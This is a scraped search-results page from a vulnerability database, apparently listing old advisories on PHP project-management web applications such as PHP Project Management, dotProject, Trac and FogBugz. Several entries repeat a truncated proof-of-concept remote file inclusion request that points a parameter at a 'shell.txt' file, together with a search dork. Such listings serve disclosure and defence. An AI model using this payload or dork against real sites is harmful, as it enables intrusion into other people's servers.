Lucene search
K

770 matches found

seebug.org
seebug.org
added 2007/10/23 12:0 a.m.22 views

PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities

No description provided by source. PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2007/10/21 12:0 a.m.54 views

PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions

PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2007/10/21 12:0 a.m.36 views

PHP Project Management 0.8.10 - Multiple LocalRemote File Inclusions

PHP Project Management 0.8.10 - Multiple LocalRemote File Inclusions PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI...

0.2AI score
Exploits0
0day.today
0day.today
added 2007/10/21 12:0 a.m.23 views

PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities

Exploit for unknown platform in category web applications =================================================================== PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities =================================================================== PHP Project Management = 0.8.10...

7.1AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2006/02/15 12:0 a.m.66 views

dotProject Multiple Scripts Remote File Inclusion

The remote host is running dotProject, a web-based, open source, project management application written in PHP. The installed version of dotProject fails to sanitize input to various parameters and scripts before using it to include PHP code. Provided PHP's 'registerglobals' setting is enabled, a...

7.5CVSS6AI score0.07846EPSS
Exploits3References6
Gentoo Linux
Gentoo Linux
added 2006/01/26 12:0 a.m.33 views

Trac: Cross-site scripting vulnerability

Background Trac is a minimalistic web-based project management, wiki and bug tracking system including a Subversion interface. Description Christophe Truc discovered that Trac fails to properly sanitize input passed in the URL. Impact A remote attacker could exploit this to inject and execute...

4.3CVSS6.9AI score0.01437EPSS
Exploits0
Packet Storm
Packet Storm
added 2006/01/15 12:0 a.m.38 views

FogBugzXSS.txt

I.Vulnerability FogBugz Cross Site Scripting Vulnerability II.Vendor Fog Creek Software www.fogcreek.com III.Affected Systems - FogBugz = 4.029 IV.About FogBugz is a complete web based project management system for software teams. Designed by Joel Spolsky of Joel on Software fame www.fogcreek.com...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2005/12/21 12:0 a.m.25 views

Plexcor&#39;s&#40;r&#41; CMS XSS vuln.

Plexcor's® CMS XSS vuln. Vuln. discovered by : r0t Date: 21 dec. 2005 orginal advisory:http://pridels.blogspot.com/2005/12/plexcors-cms-xss-vuln.html vendor:http://www.plexcor.com/ affected version: 4.0 and prior Product Description: Integrated modular content, communications, calendar, commerce,...

1.1AI score
Exploits0
Packet Storm
Packet Storm
added 2003/03/29 12:0 a.m.31 views

alexandria.txt

====================================================================== Secunia Research 28/03/2003 - Alexandria-dev / sourceforge multiple vulnerabilities - ====================================================================== Receive Secunia Security Advisories for free:...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2003/01/28 12:0 a.m.47 views

dotproject Remote File Access Vulnerability

dotproject Remote File Access Vulnerability By Mindwarper :: [email protected] :: ------- ------- ---------------------- Vendor Information: ---------------------- Homepage : http://www.dotproject.net Vendor : informed Mailed advisory: 26/01/02 Vender Response : None ----------------------...

0.1AI score
Exploits0
Rows per page
Query Builder